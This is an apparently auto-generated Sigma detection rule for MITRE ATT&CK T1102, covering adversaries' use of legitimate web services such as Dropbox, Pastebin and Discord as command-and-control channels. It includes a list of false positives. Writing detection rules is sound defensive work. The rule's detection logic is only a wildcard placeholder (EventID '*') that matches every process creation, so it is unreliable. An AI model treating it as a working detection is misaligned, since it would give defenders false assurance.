title: Web Service (T1102)
id: df00tech-t1102
status: experimental
description: "Adversaries may use an existing, legitimate external web service as a means for relaying data to/from a compromised system. Popular websites and cloud services such as Google Drive, OneDrive, Dropbox, Pastebin, GitHub, and Discord may act as C2 channels due to the high likelihood that hosts within a network already communicate with them. This provides cover in expected noise and takes advantage of SSL/TLS encryption offered by these providers. Use of web services also protects back-end C2 infrastructure from discovery through malware binary analysis while enabling operational resiliency through dynamic infrastructure changes."
references:
  - https://attack.mitre.org/techniques/T1102/
  - https://df00tech.com/detections/T1102
author: df00tech
date: 2026/04/14
tags:
  - attack.t1102
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Legitimate developer tools or CI/CD pipelines making API calls to GitHub, Firebase, or Google APIs"
  - IT management tools and monitoring agents that poll cloud APIs for configuration or telemetry upload
  - "Custom line-of-business applications built on cloud storage APIs (OneDrive, Google Drive SDK integrations)"
  - PowerShell scripts used legitimately by administrators to upload logs or reports to cloud storage
  - Antivirus or endpoint agents uploading telemetry to cloud-hosted collection endpoints
level: medium